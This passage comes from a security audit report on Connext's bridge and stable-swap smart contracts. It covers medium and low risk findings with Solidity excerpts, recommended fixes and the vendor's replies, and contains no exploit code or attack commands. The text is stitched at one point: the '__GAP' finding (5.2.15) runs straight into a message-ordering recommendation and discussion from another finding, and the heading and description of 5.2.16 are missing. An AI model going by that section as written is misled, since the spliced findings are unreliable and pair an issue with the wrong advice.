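A minimal sketch of such a restricted endpoint (the modifier and event names are ours; as Connext notes, token balances and adminFees would also need adjusting, which is why pool removal was preferred):

function updateTokenPrecisionMultiplier(bytes32 key, uint8 index, uint256 multiplier) external onlyOwnerOrAdmin {
  // corrects a mis-supplied decimal; does not rescale existing balances or adminFees
  s.swapStorages[key].tokenPrecisionMultipliers[index] = multiplier;
  emit TokenPrecisionMultiplierUpdated(key, index, multiplier);
}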
+5.2.8 Presence of delegate not enforced Severity: Medium Risk Context: BridgeFacet.sol#L395-L414, BridgeFacet.sol#L563-L567, BridgeFacet.sol#L337-L369 Description: A delegate address on the destination chain can be used to fix stuck transactions by changing the slippage limits and by re-executing transactions. However, the presence of a delegate address isn't checked in _xcall(). Note: set to medium risk because tokens could get lost. function forceUpdateSlippage(TransferInfo calldata _params, uint256 _slippage) external onlyDelegate(_params) { ... } function execute(ExecuteArgs calldata _args) external nonReentrant whenNotPaused returns (bytes32) { (bytes32 transferId, DestinationTransferStatus status) = _executeSanityChecks(_args); ... } function _executeSanityChecks(ExecuteArgs calldata _args) private view returns (bytes32, DestinationTransferStatus) { // If the sender is not approved relayer, revert if (!s.approvedRelayers[msg.sender] && msg.sender != _args.params.delegate) { revert BridgeFacet__execute_unapprovedSender(); } } Recommendation: Enforce the presence of a delegate address in _xcall(), or at least document the behavior explicitly. Connext: Yes, it's always going to be necessary to have a delegate if you want to have a strategy for handling destination-side slippage conditions being unfavorable. If you don't have one, you are taking on the bet that unfavorable slippage conditions won't be maintained indefinitely. Some groups see having any EOA or multisig that can impact these parameters as a huge no-no, and requiring one to be defined would be a nonstarter for them. So we allow not providing one on that front, even if it is more risky and could lead to funds being frozen in transit. We should add more clarity around this in the documentation though. Spearbit: Acknowledged. +5.2.9 Relayer could lose funds Severity: Medium Risk Context: BridgeFacet.sol#L828-L835 Description: The xReceive function on the receiver side can contain unreliable code which the Relayer is unaware of. In the future, more relayers will participate in completing transactions. Consider the following scenario: 1. Say that Relayer A executes the xReceive function on the receiver side. 2. In the xReceive function, a call to a withdraw function in a foreign contract is made where Relayer A is holding some balance. 3. If this foreign contract is checking tx.origin (say deposits/withdrawals were done via a third party), then Relayer A's funds will be withdrawn without his permission (since tx.origin will be the Relayer). Recommendation: Relayers should be advised to use an untouched wallet address so that foreign code interaction cannot harm them. Connext: To be documented; relayer EOAs should be single-purpose. Spearbit: Acknowledged. +5.2.10 TypedMemView.sameType does not use the correct right shift value to compare two bytes29s Severity: Medium Risk Context: TypedMemView.sol#L402 Description: The function sameType should shift 2 * 12 + 3 bytes to access the type flag (TTTTTTTTTT) when comparing it to 0. This is due to the fact that when using the bytes29 type in bitwise operations and in comparisons to 0, a parameter of type bytes29 is zero-padded from the right so that it fits into a uint256 under the hood. 0x TTTTTTTTTT AAAAAAAAAAAAAAAAAAAAAAAA LLLLLLLLLLLLLLLLLLLLLLLL 00 00 00 Currently, sameType only shifts the XORed value 2 * 12 bytes, so the comparison compares the type flag together with the 3 leading bytes of the memory address in the packing specified below: // First 5 bytes are a type flag. // - ff_ffff_fffe is reserved for unknown type. // - ff_ffff_ffff is reserved for invalid types/errors. // next 12 are memory address // next 12 are len // bottom 3 bytes are empty The function is not used in the codebase, but it can pose an important issue if incorporated into the project in the future.
function sameType(bytes29 left, bytes29 right) internal pure returns (bool) { return (left ^ right) >> (2 * TWELVE_BYTES) == 0; } Recommendation: Change sameType() to take the zero padding into account: uint256 private constant TWENTY_SEVEN_BYTES = 8 * 27; ... function sameType(bytes29 left, bytes29 right) internal pure returns (bool) { return (left ^ right) >> TWENTY_SEVEN_BYTES == 0; } See summa-tx/memview-sol/pull/10 for a solution. We also recommend leaving a header comment indicating the source of libraries/contracts used. Connext: Solved in PR 2394. Spearbit: Verified. +5.2.11 Incorrect formula for the scaled amplification coefficient in NatSpec comments Severity: Medium Risk Context: • StableSwapFacet.sol#L70 • SwapAdminFacet.sol#L103 • StableSwap.sol#L64 • StableSwap.sol#L143 • AmplificationUtils.sol#L24 • SwapUtils.sol#L62 • SwapUtils.sol#L248 • SwapUtils.sol#L304 • SwapUtilsExternal.sol#L54 • SwapUtilsExternal.sol#L127 • SwapUtilsExternal.sol#L285 • SwapUtilsExternal.sol#L341 Description: In the context above, the scaled amplification coefficient a is described by the formula A * n * (n - 1), where A is the actual amplification coefficient in the stable swap invariant equation for n tokens. * @param a the amplification coefficient * n * (n - 1) ... The actual adjusted/scaled amplification coefficient would need to be A * n^(n-1) and not A * n * (n - 1); otherwise, most of the calculations done when swapping between 2 tokens in a pool with more than 2 tokens would be wrong. For the special case of n = 2 those values are actually equal: 2^(2-1) = 2 = 2 * 1. So for swaps or pools that involve only 2 tokens, the issue in the comment is not so critical. But if the number of tokens is more than 2, then we need to make sure we calculate and feed the right parameter to AppStorage.swapStorages.{initial, future}A. Recommendation: Fix the NatSpec comments to: * @param a the amplification coefficient * n ** (n - 1) ... And make sure any values of a for init functions or as an input to swap functions are scaled using n^(n-1) from the amplification coefficient. It looks like the original source for SwapUtils is from here: SwapUtils.sol, which is a Solidity rewrite of the Curve Finance pool template contracts in Vyper: pool-templates. It is recommended to add header NatSpec comments mentioning authors or original/modified sources for all files, including the ones mentioned in this issue. Connext: Solved in PR 2353. Spearbit: Verified. +5.2.12 RootManager.propagate does not operate in a fail-safe manner Severity: Medium Risk Context: RootManager.sol#L147-L173 Description: A bridge failure on one of the supported chains will cause the entire messaging network to break down. When the RootManager.propagate function is called, it will loop through the hub connectors of all six chains (Arbitrum, Gnosis, Multichain, Optimism, Polygon, ZkSync) and attempt to send over the latest aggregated root by making a function call to the respective chain's AMB contract. There is a tight dependency between the chain's AMB and the hub connector. The problem is that if one of the function calls to a chain's AMB contract reverts (e.g. one of the bridges is paused), the entire RootManager.propagate function will revert, and the messaging network will stop working until someone figures out the problem and manually removes the problematic hub connector. As Connext grows, the number of chains supported will increase, and the risk of this issue occurring will also increase. Recommendation: The RootManager.propagate function should operate in a fail-safe manner (e.g. using try-catch or address.call), as sketched below. Chains' AMB contracts are considered external third parties and are beyond Connext's control. Thus, the RootManager.propagate function should not assume that function calls to these third-party bridge contracts will always succeed and will not revert. Connext: Solved in PR 2430. Spearbit: Verified.
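A minimal sketch of the try-catch approach inside propagate() (the interface, function, and event names here are ours):

for (uint256 i; i < connectors.length; ) {
  // a paused or broken AMB must not block propagation to the other domains
  try IHubConnector(connectors[i]).sendMessage(abi.encode(aggregateRoot)) {
    // root forwarded successfully
  } catch {
    emit PropagateFailed(domains[i], connectors[i]);
  }
  unchecked {
    ++i;
  }
}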
+5.2.13 Arborist once whitelisted cannot be removed Severity: Medium Risk Context: Merkle.sol#L93-L97 Description: An Arborist has the power to write over the Merkle root. In case an Arborist starts misbehaving (compromise or security issue), there is no way to remove this Arborist from the whitelist. Recommendation: Revise the setArborist function to allow toggling an arborist's whitelisting status: function setArborist(address newArborist, bool status) external onlyOwner { if (newArborist == address(0)) revert MerkleTreeManager__setArborist_zeroAddress(); if (arborists[newArborist] == status) revert MerkleTreeManager__setArborist_alreadyArborist(); arborists[newArborist] = status; } Connext: Solved in PR 2426. Spearbit: Verified. +5.2.14 WatcherManager is not set correctly Severity: Medium Risk Context: WatcherClient.sol#L36-L39 Description: The setWatcherManager function fails to actually update watcherManager; instead, it just emits an event claiming that the WatcherManager was updated when it was not. This could become a problem once new modules are added/revised in the WatcherManager contract and WatcherClient wants to use the upgraded WatcherManager. WatcherClient will be forced to use the outdated WatcherManager contract code. Recommendation: Revise the setWatcherManager function as shown below:

  function setWatcherManager(address _watcherManager) external onlyOwner {
    require(_watcherManager != address(watcherManager), "already watcher manager");
+   watcherManager = WatcherManager(_watcherManager);
    emit WatcherManagerChanged(_watcherManager);
  }

Connext: Fixed in PR 2432. Spearbit: Verified. +5.2.15 Check __GAPs Severity: Medium Risk Context: LPToken.sol#L16, OwnerPausableUpgradeable.sol#L16, StableSwap.sol#L39, Merkle.sol#L37, ProposedOwnable.sol#L193 Description: All __GAPs have the same size, while the different contracts have a different number of storage variables. If the __GAP size isn't logical, it is more difficult to maintain the code. Note: set to a risk rating of medium because the probability of something going wrong with future upgrades is low to medium, and the impact of mistakes would be medium to high.

LPToken.sol:                  uint256[49] private __GAP; // should probably be 50
OwnerPausableUpgradeable.sol: uint256[49] private __GAP; // should probably be 50
StableSwap.sol:               uint256[49] private __GAP; // should probably be 48
Merkle.sol:                   uint256[49] private __GAP; // should probably be 48
ProposedOwnable.sol:          uint256[49] private __GAP; // should probably be 47
Recommendation: Ensure that messages are always processed in order. Otherwise, if the risk is deemed acceptable, update the documentation to highlight that messages can be delivered out of order and that it is up to Connext users to protect themselves against this. Connext: This problem reminds me of MEV around sequencing when building blocks. I think enforcing the message order would create additional complex problems. What if a certain message couldn't be processed, because the stableswap slippage had moved beyond the user-set slippage tolerance? In that case, all following messages would be beholden to that one user coming back to make sure they update their slippage tolerance (creating an isAlive assumption). What if that user doesn't want to increase their slippage tolerance - they'd rather wait out market conditions on their own time? They hold up the entire queue, a queue of quite possibly unrelated txs. It's true that a relayer could choose to relay certain txs ahead of others. They could be biased towards their own transfers, and do some MEV/frontrunning this way... but any frontrunning that the relayer could do, anyone could do, simply by looking at the transaction in the mempool and frontrunning or sandwiching it for profit. Even if the relayer used flashbots, any observer could examine our subgraphs to see inbound txs. The relayer could definitely execute such MEV a bit more comfortably (by guaranteeing their frontrun goes through), but that slight benefit/advantage of their role in the system is not worth the UX tradeoffs involved in serializing here - which would almost guarantee occasional spots of traffic/congestion. Spearbit: Acknowledged.
+5.2.17 Extra checks in _verifySender() of GnosisBase Severity: Medium Risk Context: GnosisBase.sol#L16-L19 Description: According to the Gnosis bridge documentation, the source chain id should also be checked using messageSourceChainId(). This is because in the future the same arbitrary message bridge contract could handle requests from different chains. If a malicious actor were able to gain access to the contract at mirrorConnector on a to-be-supported chain that is not the MIRROR_DOMAIN, they could send an arbitrary root to this mainnet/L1 hub connector, which the connector would mark as coming from the MIRROR_DOMAIN. So the attacker can spoof/forge function calls and asset transfers by creating a payload root and using this, along with their access to mirrorConnector on that chain, to send a cross-chain processMessage to the Gnosis hub connector; afterwards they can use their payload root and proofs to forge/spoof transfers on the L1 chain. Although it is unlikely that any other party could add a contract with the same address as _amb on another chain, it is safer to add additional checks. function _verifySender(address _amb, address _expected) internal view returns (bool) { require(msg.sender == _amb, "!bridge"); return GnosisAmb(_amb).messageSender() == _expected; } Recommendation: In function _verifySender() add a check to verify messageSourceChainId() == MIRROR_DOMAIN. Note: this will probably require adding an extra parameter to _verifySender(). Connext: The chainId != domain, so it has to be stored separately. Going to use sourceChainId() instead of messageSourceChainId(), as there is no documentation of what the bytes32 should represent instead of uint256. Solved in PR. Spearbit: Verified.
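To illustrate the check adopted for the finding above - a minimal sketch, assuming (per Connext's response) that the AMB exposes sourceChainId(); the extra _mirrorChainId parameter is illustrative:

    function _verifySender(
        address _amb,
        address _expected,
        uint256 _mirrorChainId // illustrative: the chain id corresponding to MIRROR_DOMAIN
    ) internal view returns (bool) {
        require(msg.sender == _amb, "!bridge");
        // pin both the message sender and the source chain, so a future chain
        // served by the same AMB contract cannot impersonate the mirror connector
        return
            GnosisAmb(_amb).messageSender() == _expected &&
            GnosisAmb(_amb).sourceChainId() == _mirrorChainId;
    }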
+5.2.18 Absence of Minimum delayBlocks Severity: Medium Risk Context: RootManager.sol#L102-106, SpokeConnector.sol#L218-L221 Description: The owner can accidentally set delayBlocks to 0 (or a very small number of delay blocks), which would collapse the whole fraud protection mechanism. Since there is no check for a minimum delay before setting a new delay value, even a very low value will be accepted by the setDelayBlocks function: function setDelayBlocks(uint256 _delayBlocks) public onlyOwner { require(_delayBlocks != delayBlocks, "!delayBlocks"); emit DelayBlocksUpdated(_delayBlocks, delayBlocks); delayBlocks = _delayBlocks; } Recommendation: Introduce a variable minDelay which defines the minimum delay allowed by the contract. Any attempt to change the delay value using the setDelayBlocks function should ensure that the new delay is larger than or equal to minDelay. Connext: We could add a minimum for when delayBlocks is not 0, but that minimum will vary by chain / block time, so that minimum HAS to be configurable. We could add a separate configuration endpoint and make it so it takes 72 hours to change the delay blocks minimum, but that feels more like DAO functionality/responsibility. For that reason, going with "acknowledged". At the very least, users can visibly check what the delayBlocks are set to on-chain to make sure it's reasonable. Spearbit: Acknowledged.
+5.2.19 Add extra 0 checks in verifyAggregateRoot() and proveMessageRoot() Severity: Medium Risk Context: SpokeConnector.sol#L403-L422, SpokeConnector.sol#L456-L481 Description: The functions verifyAggregateRoot() and proveMessageRoot() verify and confirm roots. A root value of 0 is a special case. If this value were allowed, then the functions could allow invalid roots to be passed. Currently the functions verifyAggregateRoot() and proveMessageRoot() don't explicitly verify that the roots are not 0. function verifyAggregateRoot(bytes32 _aggregateRoot) internal { if (provenAggregateRoots[_aggregateRoot]) { return; } ... // do several verifications provenAggregateRoots[_aggregateRoot] = true; ... } function proveMessageRoot(...) ... { if (provenMessageRoots[_messageRoot]) { return; } ... // do several verifications provenMessageRoots[_messageRoot] = true; } Recommendation: As an extra safety precaution do the following: • In function verifyAggregateRoot() check _aggregateRoot != 0. • In proveMessageRoot() check _messageRoot != 0. Connext: Solved in PR 2442. No check added in proveMessageRoot() because calculateMessageRoot() never results in 0. Spearbit: Verified.
5.3 Low Risk
+5.3.1 _removeAssetId() should also clear custodied Severity: Low Risk Context: TokenFacet.sol#L483-L534 Description: In one of the fixes in PR 2530, _removeAssetId() doesn't clear custodied, as it is assumed to be 0. function _removeAssetId(...) ... { // NOTE: custodied will always be 0 at this point } However, custodied isn't always 0. Suppose cap and custodied have a value (!= 0), and then _setLiquidityCap() is called to set the cap to 0. The function doesn't reset the custodied value, so it will stay != 0. Recommendation: Clear custodied. Connext: The balance check of _removeAssetId would cover this case. If the balance of the contract is 0 for the canonical asset, the entirety of the assets must be unbridged (meaning custodied would be 0). Additionally, when _setLiquidityCap is called with an enforceable (nonzero) value, it is always set to the balance of the contract.
Spearbit: Acknowledged.
+5.3.2 Remove liquidity while paused Severity: Low Risk Context: StableSwapFacet.sol#L312-L360, StableSwap.sol#L394-L446 Description: The function removeLiquidity() in StableSwapFacet.sol has a whenNotPaused modifier, while the comment says "Liquidity can always be removed, even when the pool is paused.". On the other hand, the function removeLiquidity() in StableSwap.sol doesn't have this modifier. StableSwapFacet.sol#L312-L360: // Liquidity can always be removed, even when the pool is paused. function removeLiquidity(...) external ... nonReentrant whenNotPaused ... { ... } function removeLiquidityOneToken(...) external ... nonReentrant whenNotPaused ... { ... } function removeLiquidityImbalance(...) external ... nonReentrant whenNotPaused ... { ... } StableSwap.sol#L394-L446: // Liquidity can always be removed, even when the pool is paused. function removeLiquidity(...) external ... nonReentrant ... { ... } function removeLiquidityOneToken(...) external ... nonReentrant whenNotPaused ... { ... } function removeLiquidityImbalance(...) external ... nonReentrant whenNotPaused ... { ... } Recommendation: Double-check whether removal of liquidity should be allowed while paused. Connext: Solved in PR 2354. Spearbit: Verified, all functions have whenNotPaused now.
+5.3.3 Relayers can frontrun each other's calls to BridgeFacet.execute Severity: Low Risk Context: • BridgeFacet.sol#L337 • BridgeFacet.sol#L366 • BridgeFacet.sol#L565-L567 • BridgeFacet.sol#L381 Description: Relayers can front-run each other's calls to BridgeFacet.execute. Currently, there is no on-chain mechanism to track how many fees should be allocated to each relayer. All the transfer bump fees are funneled into one address, s.relayerFeeVault. Recommendation: If, for example, off-chain agents keep track of the following event emitted by execute and use it to calculate the distribution of funds per relayer, that can motivate the relayers to front-run each other. emit Executed(transferId, _args.params.to, asset, _args, local, amount, msg.sender); Note: Only the delegate and allowed/approved relayers can call execute. Connext: At the moment, fee disbursements for relayers are handled in a trusted manner. We're working with Gelato to figure out a better long term solution here. More generally, if we have adversarial relayer networks (i.e. relayers are not beholden to a shared set of offchain incentives to penalize frontrunning), this issue will always exist. This is why we've chosen to only work with one decentralized relayer network for now. Spearbit: Acknowledged.
+5.3.4 OptimismHubConnector.processMessageFromRoot emits MessageProcessed for already processed messages Severity: Low Risk Context: • OptimismHubConnector.sol#L119-L120 • OptimismHubConnector.sol#L76-L81 Description: Calls to processMessageFromRoot with an already processed _data still emit MessageProcessed. This might cause issues for off-chain agents like relayers monitoring this event.
Recommendation: We recommend moving MessageProcessed inside _processMessage's if block: function _processMessage(bytes memory _data) internal override { // sanity check root length require(_data.length == 32, "!length"); // get root from data bytes32 root = bytes32(_data); if (!processed[root]) { // set root to processed processed[root] = true; // update the root on the root manager IRootManager(ROOT_MANAGER).aggregate(MIRROR_DOMAIN, root); emit MessageProcessed(_data, msg.sender); // <--- added line } // otherwise root was already sent to root manager } Note: if we inline _processMessage inside processMessageFromRoot, we can avoid encoding and then decoding the root. Connext: Solved in PR 2447. Spearbit: Verified.
+5.3.5 Add max cap for domains Severity: Low Risk Context: DomainIndexer.sol#L99 Description: Currently there isn't any cap on the maximum number of domains the system can support. If the set of domains and connectors grows, at some point, due to out-of-gas errors in the updateHashes function, both addDomain and removeDomain could be DoSed. Recommendation: Place a cap MAX_DOMAINS. function addDomain(uint32 _domain, address _connector) internal { ... // MAX_DOMAINS could be defined globally as `uint256 public constant MAX_DOMAINS = {value};` require(domains.length < MAX_DOMAINS, "DomainIndexer at capacity"); ... } Connext: Fixed in PR 2209. Spearbit: Verified.
+5.3.6 In certain scenarios calls to xcall... or addRouterLiquidity... can be DoSed Severity: Low Risk Context: • TokenFacet.sol#L219-L222 • BridgeFacet.sol#L489-L497 • RoutersFacet.sol#L554-L561 Description: The owner or an admin can frontrun (or it can happen by accident) a call that: • A router has made on the canonical domain of a canonical token to supply that token as liquidity, OR • A user has made to xcall..., supplying a canonical token on its canonical domain. The frontrunning call would set the cap to a low number (calling updateLiquidityCap). This would cause the calls mentioned in the bullet list to fail due to the checks against IERC20(_local).balanceOf(address(this)). Recommendation: This is a low-risk issue due to the severity and the amount of privilege required to execute. But a delayed update mechanism could be applied to updateLiquidityCap, or perhaps a governance body could vote on setting new caps. Connext: This seems to me to be a pure griefing vector and, in my opinion, can be ignored if that is the case. Spearbit: Acknowledged.
+5.3.7 Missing a check against address(0) in ConnextPriceOracle's constructor Severity: Low Risk Context: ConnextPriceOracle.sol#L78-L81 Description: When ConnextPriceOracle is deployed, an address _wrapped is passed to its constructor. The current codebase does not check whether the passed _wrapped can be address(0) or not. Recommendation: Add a check to make sure the _wrapped value provided cannot be address(0). Connext: Solved in PR 2371. Spearbit: Verified.
+5.3.8 _executeCalldata() can revert if insufficient gas is supplied Severity: Low Risk Context: BridgeFacet.sol#L785-L840 Description: The function _executeCalldata() contains the statement gasleft() - 10_000. This statement can revert if the available gas is less than 10_000. Perhaps this is the expected behaviour. Note: From the Tangerine Whistle fork, only a maximum of 63/64 of the available gas is sent to the contract being called. Therefore, 1/64th is left for the calling contract. function _executeCalldata(...) ... { ... (success, returnData) = ExcessivelySafeCall.excessivelySafeCall(_params.to, gasleft() - 10_000, ...
); ... } Recommendation: Double-check the gas requirements. Consider giving a clearer error message if insufficient gas is supplied. Connext: Solved in PR 2519. Spearbit: Verified.
+5.3.9 Be aware of precompiles Severity: Low Risk Context: BridgeFacet.sol#L785-L840 Description: The external calls made by _executeCalldata() could call a precompile. Different chains have creative precompile implementations, so this could in theory pose problems. For example, precompile 4 copies memory: what-s-the-identity-0x4-precompile Note: precompiles link to dedicated pieces of code written in Rust or Go that can be called from the EVM. Here are a few links to documentation for different chains: moonbeam precompiles, astar precompiles. function _executeCalldata(...) ... { ... (success, returnData) = ExcessivelySafeCall.excessivelySafeCall(_params.to, ...); } else { returnData = IXReceiver(_params.to).xReceive(...); } ... } Recommendation: When deploying to new chains, verify that available precompiles can't be abused. Connext: Added a comment in PR 2446 to reflect this, but this is a risk. Spearbit: Acknowledged.
+5.3.10 Upgrade to solidity 0.8.17 Severity: Low Risk Context: nxtp contracts Description: Solidity 0.8.17 released a bugfix where the optimizer could incorrectly remove storage writes if the code fit a certain pattern (see this security alert). This bug was introduced in 0.8.13. Since Connext is using the legacy code generation pipeline, i.e., compiling without the via-IR flag, the current code is not at risk. This is because its assembly blocks don't write to storage. However, if this changes and Connext compiles through via-IR code generation, the code is more likely to be affected. One reason to use this code generation pipeline could be to enable gas optimizations not available in legacy code generation. Recommendation: Consider upgrading to solidity 0.8.17. Connext: Fixed in PR 2436. Spearbit: Verified.
+5.3.11 Add domain check in setupAssetWithDeployedRepresentation() Severity: Low Risk Context: TokenFacet.sol#L192-L204 Description: The function setupAssetWithDeployedRepresentation() links a new _representation asset. However, this should not be done on the canonical domain, so it is good to check for this to prevent potential mistakes. function setupAssetWithDeployedRepresentation(...) ... { bytes32 key = _enrollAdoptedAndLocalAssets(_adoptedAssetId, _representation, _stableSwapPool, _canonical); ... } Recommendation: Add a check for (_canonical.domain != s.domain). Connext: Solved in PR 2298. Spearbit: Verified.
+5.3.12 If an adopted token and its canonical live on the same domain the cap for the custodied amount is applied for each of those tokens Severity: Low Risk Context: RoutersFacet.sol#L554-L561 Description: If _local is an adopted asset that lives on its canonical's original chain, then we are comparing the to-be-updated balance of this contract (custodied) with s.caps[key]. That means we are also comparing the balance of an adopted asset with the property above with the cap. For example, if A is the canonical token and B the adopted one, then cap = s.caps[key] is used to cap the custodied amount in this contract for both of those tokens. So if the cap is 1000, the contract can have a balance of 1000 A and 1000 B, which is twice the amount meant to be capped. This is true basically for any approved asset with the above properties.
When the owner or the admin calls setupAsset: // File: https://github.com/connext/nxtp/blob/32a0370edc917cc45c231565591740ff274b5c05/packages/deployments/contracts/contracts/core/connext/facets/TokenFacet.sol#L164-L172 function setupAsset( TokenId calldata _canonical, uint8 _canonicalDecimals, string memory _representationName, string memory _representationSymbol, address _adoptedAssetId, address _stableSwapPool, uint256 _cap ) external onlyOwnerOrAdmin returns (address _local) { such that _canonical.domain == s.domain and _adoptedAssetId != 0, then this asset has the property in question. Recommendation: Extra attention must be paid to tokens with such properties; perhaps set the cap equal to half the amount one would have set otherwise. Connext: Local on the canonical domain should always be the adopted asset; this assertion is represented in PR 2455. Spearbit: Verified.
+5.3.13 There are no checks/constraints against the _representation provided to setupAssetWithDeployedRepresentation Severity: Low Risk Context: TokenFacet.sol#L192-L198 Description: setupAssetWithDeployedRepresentation is similar to setupAsset in terms of functionality, except it does not deploy a representation token if necessary. It actually uses the _representation address given as the representation token. The _representation parameter given does not have any checks in terms of functionality, compared to setupAsset which deploys a new BridgeToken instance: // File: packages\deployments\contracts\contracts\core\connext\facets\TokenFacet.sol#L399 _token = address(new BridgeToken(_decimals, _name, _symbol)); Basically, _representation needs to implement IBridgeToken (mint, burn, setDetails, ...) and some sort of IERC20. Otherwise, if a function from IBridgeToken is not implemented or if it does not have IERC20 functionality, it can cause failures/reverts in some functions in this codebase. Another important point is that the decimals of _representation should be equal to the decimals precision of the canonical token, and _representation should not be able to update/change its decimals. Also, this opens an opportunity for a bad owner or admin to provide a malicious _representation to this function. This does not have to be a malicious act; it can also happen by mistake, for example by an admin. Additionally, the Connext Diamond must have the "right" to mint() and burn() the tokens. Recommendation: We can require a call to a specific endpoint of _representation to return a magic value that would indicate that it supports some specific interfaces. This would only be a measure against possible benign mistakes that could happen when the admins or the owner call setupAssetWithDeployedRepresentation() with a wrong value for _representation. Also verify that tokens can be mint()ed and burn()ed. Connext: In the following PR, NatSpec comments have been added to warn devs about this issue: PR 2472. Also, in _enrollAdoptedAndLocalAssets, minting and burning of an IBridgeToken asset is tested when not on a canonical domain. Spearbit: Verified.
+5.3.14 In dequeueVerified when no verified items are found in the queue last == first - 1 Severity: Low Risk Context: Queue.sol#L80 Description: The comment in dequeueVerified mentions that when no verified items are found in the queue, then last == first. But this is not true, since the loop condition is last >= first and the loop only terminates (not considering the break) when last == first - 1.
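To see why, consider a minimal sketch of the loop shape being described (illustrative names; not the actual Queue.sol code):

    // Walk backwards from the newest item looking for the newest verified one.
    uint128 first = queue.first;
    uint128 last = queue.last;
    while (last >= first) {
        if (isVerified(last)) {
            break; // found a verified item; dequeue [first, last]
        }
        unchecked { --last; }
    }
    // If nothing in [first, last] is verified, the break is never hit and the
    // loop exits through its condition with last == first - 1, not last == first.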
It is important to correct this incorrect statement in the comment, since a dev/user could by mistake take the statement as true and modify/use the code with this incorrect assumption in mind. Recommendation: Update the comment so that: - first == last + last == first - 1 Connext: Solved in PR 2228. Spearbit: Verified.
+5.3.15 Dirty bytes in _loc and _len can override other values when packing a typed memory view in unsafeBuildUnchecked Severity: Low Risk Context: • TypedMemView.sol#L323-L324 • TypedMemView.sol#L329-L330 Description: For a TypedMemView, the location and the length are each supposed to occupy 12 bytes (uint96), but the type used for these values in the input parameters of unsafeBuildUnchecked is uint256. This would allow those values to carry dirty bytes, and when the following calculations are performed: newView := shl(96, or(newView, _type)) // insert type newView := shl(96, or(newView, _loc)) // insert loc newView := shl(24, or(newView, _len)) // empty bottom 3 bytes _loc can potentially manipulate the type section of the view, and _len can potentially manipulate both the _loc and the _type sections. Recommendation: Either restrict the input parameter types or perform cleanup via masking in assembly to make sure those values are not able to override other values in the packed view. Connext: Solved in PR 2475. Spearbit: Verified.
+5.3.16 To use sha2, hash160 and hash256 of TypedMemView the hard-coded precompile addresses would need to be checked to make sure they return the corresponding hash values Severity: Low Risk Context: • TypedMemView.sol#L646 • TypedMemView.sol#L668-L669 • TypedMemView.sol#L685-L686 Description: sha2, hash160 and hash256 assume that the precompile contracts at address(2) and address(3) calculate and return the sha256 and ripemd160 hashes of the provided memory chunks. These assumptions depend on the chain the project is going to be deployed on. Recommendation: To use sha2, hash160 and hash256 of TypedMemView, the hard-coded precompile addresses would need to be checked to make sure they are available on the specific chain and that they return the corresponding hash values. For example, zkSync recently added the precompile contracts for sha256 and keccak256, and the compiler zksolc inlines the precompile addresses for those endpoints (0x0002, 0x8010). Connext: Functions removed in PR 2472. Spearbit: Verified.
+5.3.17 sha2, hash160 and hash256 of TypedMemView do not clear the memory after calculating the hash Severity: Low Risk Context: • TypedMemView.sol#L646 • TypedMemView.sol#L662 • TypedMemView.sol#L679 Description: When a call to the precompile contract at address(2) (or at address(3)) is made, the returned value is placed at the slot pointed to by the free memory pointer and then placed on the stack. The free memory pointer is not incremented to account for this used memory position, nor does the code try to clean this 32-byte memory slot. Therefore, after a call to sha2, hash160 or hash256, we end up with dirty bytes. Recommendation: Either increment the free memory pointer by 0x20 to account for the dirty bytes or clean the dirty bytes. Cleaning would be cheaper, since memory might not get expanded for the next memory operation in the codebase. As a side note, it might be best to call the sha2 function sha256. Connext: Removed in PR 2474. Spearbit: Verified.
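A minimal sketch of the cleanup recommended above, assuming the digest is written to the slot at the free memory pointer (illustrative; not the actual TypedMemView code):

    function sha256At(uint256 _loc, uint256 _len) internal view returns (bytes32 digest) {
        assembly {
            let ptr := mload(0x40)
            // call the sha256 precompile at address 2; 32 bytes of output land at ptr
            pop(staticcall(gas(), 2, _loc, _len, ptr, 0x20))
            digest := mload(ptr)
            // option 1: zero the scratch slot so no dirty bytes remain
            mstore(ptr, 0)
            // option 2 (alternative): reserve the slot instead of cleaning it:
            // mstore(0x40, add(ptr, 0x20))
        }
    }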
+5.3.18 Fee on transfer token support Severity: Low Risk Context: SwapUtils.sol#L902-L905 Description: It seems that only the addLiquidity function currently supports fee-on-transfer tokens. All other operations, like swapping, prohibit fee-on-transfer tokens. Note: The SwapUtilsExternal.sol contract allows fee-on-transfer tokens and, as per the product team, this is expected for this contract. Recommendation: If fee-on-transfer tokens are not expected while adding liquidity, then revert if the token used places any fee on transfer: require(amounts[i] == token.balanceOf(address(this)) - beforeBalance, "Fee on transfer token not supported"); Connext: Solved in PR 2217. SwapUtils is for the internal StableSwap (implemented in StableSwapFacet). That doesn't support fee tokens. SwapUtilsExternal is for the external StableSwap contract (StableSwap.sol) and it can support fee tokens as well, because all swaps and add/remove liquidity will be executed via the transferFrom function, and we can get the real amount that we received. Spearbit: Why not use AssetLogic.handleIncomingAsset(), which already has this check? It reduces code duplication. The fix should also be applied to all instances of safeTransferFrom: core-libraries/SwapUtils.sol:712: tokenFrom.safeTransferFrom(msg.sender, address(this), dx); core-libraries/SwapUtils.sol:776: tokenFrom.safeTransferFrom(msg.sender, address(this), dx); core-libraries/SwapUtils.sol:902: token.safeTransferFrom(msg.sender, address(this), amounts[i]); core-libraries/SwapUtilsExternal.sol:749: tokenFrom.safeTransferFrom(msg.sender, address(this), dx); core-libraries/SwapUtilsExternal.sol:813: tokenFrom.safeTransferFrom(msg.sender, address(this), dx); core-libraries/SwapUtilsExternal.sol:868: token.safeTransferFrom(msg.sender, address(this), amounts[i]); One can also use handleOutgoingAsset() for all outgoing transfers: core-libraries/SwapUtils.sol:732: self.pooledTokens[tokenIndexTo].safeTransfer(msg.sender, dy); core-libraries/SwapUtils.sol:782: self.pooledTokens[tokenIndexTo].safeTransfer(msg.sender, dy); core-libraries/SwapUtils.sol:988: self.pooledTokens[i].safeTransfer(msg.sender, amounts[i]); core-libraries/SwapUtils.sol:1034: self.pooledTokens[tokenIndex].safeTransfer(msg.sender, dy); core-libraries/SwapUtils.sol:1116: self.pooledTokens[i].safeTransfer(msg.sender, amounts[i]); core-libraries/SwapUtils.sol:1140: token.safeTransfer(to, balance); core-libraries/SwapUtilsExternal.sol:769: self.pooledTokens[tokenIndexTo].safeTransfer(msg.sender, dy); core-libraries/SwapUtilsExternal.sol:819: self.pooledTokens[tokenIndexTo].safeTransfer(msg.sender, dy); core-libraries/SwapUtilsExternal.sol:954: self.pooledTokens[i].safeTransfer(msg.sender, amounts[i]); core-libraries/SwapUtilsExternal.sol:1000: self.pooledTokens[tokenIndex].safeTransfer(msg.sender, dy); core-libraries/SwapUtilsExternal.sol:1082: self.pooledTokens[i].safeTransfer(msg.sender, amounts[i]); core-libraries/SwapUtilsExternal.sol:1106: token.safeTransfer(to, balance);
